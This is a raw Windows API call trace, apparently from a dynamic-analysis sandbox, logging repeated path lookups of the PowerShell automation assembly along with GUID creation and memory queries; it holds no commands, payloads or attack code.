	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.348] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa8535193, Data2=0xd149, Data3=0x4c21, Data4=([0]=0x91, [1]=0xae, [2]=0xc2, [3]=0xc, [4]=0x4a, [5]=0x7b, [6]=0x13, [7]=0x2c))) returned 0x0
	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.349] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x1a59338d, Data2=0xff0, Data3=0x4a62, Data4=([0]=0xab, [1]=0x1d, [2]=0xfa, [3]=0xb, [4]=0x98, [5]=0x86, [6]=0xcb, [7]=0x66))) returned 0x0
	[0339.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x708096a3, Data2=0x44a4, Data3=0x46f6, Data4=([0]=0x8e, [1]=0xeb, [2]=0x9b, [3]=0x27, [4]=0xe6, [5]=0x1c, [6]=0x31, [7]=0xec))) returned 0x0
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.354] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x13eccafb, Data2=0xf9f4, Data3=0x4d8b, Data4=([0]=0x83, [1]=0x26, [2]=0xe4, [3]=0xd7, [4]=0xb3, [5]=0x64, [6]=0xb7, [7]=0xf4))) returned 0x0
	[0339.354] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x636214e0, Data2=0x7618, Data3=0x4e5d, Data4=([0]=0x8c, [1]=0xe6, [2]=0x85, [3]=0x34, [4]=0x7e, [5]=0xe0, [6]=0xbd, [7]=0x9))) returned 0x0
	[0339.355] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe9f2da4c, Data2=0xd783, Data3=0x439f, Data4=([0]=0xb0, [1]=0x5b, [2]=0x25, [3]=0xcc, [4]=0xd5, [5]=0x57, [6]=0x31, [7]=0xaa))) returned 0x0
	[0339.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.356] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xf48b8006, Data2=0x95e7, Data3=0x4fe2, Data4=([0]=0xa7, [1]=0xb7, [2]=0xb9, [3]=0x14, [4]=0x54, [5]=0xbd, [6]=0xb7, [7]=0xaf))) returned 0x0
	[0339.356] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.357] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.357] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.358] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.359] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.359] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.359] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.359] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14b230, lpBuffer=0x14c0f0, dwLength=0x30 | out: lpBuffer=0x14c0f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14b2c0, lpBuffer=0x14c180, dwLength=0x30 | out: lpBuffer=0x14c180*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.360] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.361] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.361] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.361] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.361] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.362] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.362] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x71993b6c, Data2=0xe6a1, Data3=0x44bf, Data4=([0]=0xb0, [1]=0x2c, [2]=0xd3, [3]=0x8a, [4]=0xc3, [5]=0x66, [6]=0x70, [7]=0x53))) returned 0x0
	[0339.362] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.362] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.362] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.362] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.363] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.363] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.363] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.363] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.363] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.364] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.364] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.364] VirtualQuery (in: lpAddress=0x14bb40, lpBuffer=0x14ca00, dwLength=0x30 | out: lpBuffer=0x14ca00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
